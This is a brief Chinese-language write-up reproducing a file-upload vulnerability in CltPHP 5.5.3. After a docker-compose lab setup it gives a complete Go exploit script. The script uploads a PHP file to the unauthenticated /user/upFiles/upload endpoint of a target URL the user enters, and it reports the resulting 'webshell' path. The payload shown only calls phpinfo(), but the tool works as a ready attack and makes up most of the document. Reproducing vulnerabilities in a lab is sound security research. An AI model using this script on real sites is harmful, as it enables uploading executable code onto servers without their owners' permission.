Cltphp 5.5.3漏洞复现

环境搭建

使用docker-compose搭建

docker-compose build
docker-compose up -d

漏洞环境地址
https://github.com/0xs1riu5/vulawdhub

漏洞复现

这里写了一个简单的脚本

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
)

const (
	uploadURL = "%s/user/upFiles/upload"
	filePath  = "1.php"
	fileData  = "<?php phpinfo(); ?>"
)

type UploadResponse struct {
	URL string `json:"url"`
}

func clphpUpload(url string) {
	uploadURL := fmt.Sprintf(uploadURL, url)

	body := &bytes.Buffer{}
	writer := multipart.NewWriter(body)

	part, err := writer.CreateFormFile("file", filePath)
	if err != nil {
		fmt.Printf("Error creating form file: %v\n", err)
		return
	}

	_, err = io.Copy(part, bytes.NewReader([]byte(fileData)))
	if err != nil {
		fmt.Printf("Error copying file data: %v\n", err)
		return
	}

	err = writer.Close()
	if err != nil {
		fmt.Printf("Error closing writer: %v\n", err)
		return
	}

	req, err := http.NewRequest("POST", uploadURL, body)
	if err != nil {
		fmt.Printf("Error creating HTTP request: %v\n", err)
		return
	}

	req.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)")
	req.Header.Set("X-Requested-With", "XMLHttpRequest")
	req.Header.Set("Content-Type", writer.FormDataContentType())

	client := &http.Client{}
	response, err := client.Do(req)
	if err != nil {
		fmt.Printf("Error making HTTP request: %v\n", err)
		return
	}
	defer response.Body.Close()

	if response.StatusCode == http.StatusOK {
		var uploadResponse UploadResponse
		err := json.NewDecoder(response.Body).Decode(&uploadResponse)
		if err != nil {
			fmt.Printf("Error decoding JSON response: %v\n", err)
			return
		}
		fmt.Printf("webshell 上传成功!\n")
		fmt.Printf("访问路径为: %s/public%s\n", url, uploadResponse.URL)
	} else {
		fmt.Printf("Failed to upload file. Status code: %d\n", response.StatusCode)
	}
}

func main() {
	fmt.Print("Enter the URL: ")
	var url string
	fmt.Scanln(&url)
	clphpUpload(url)
}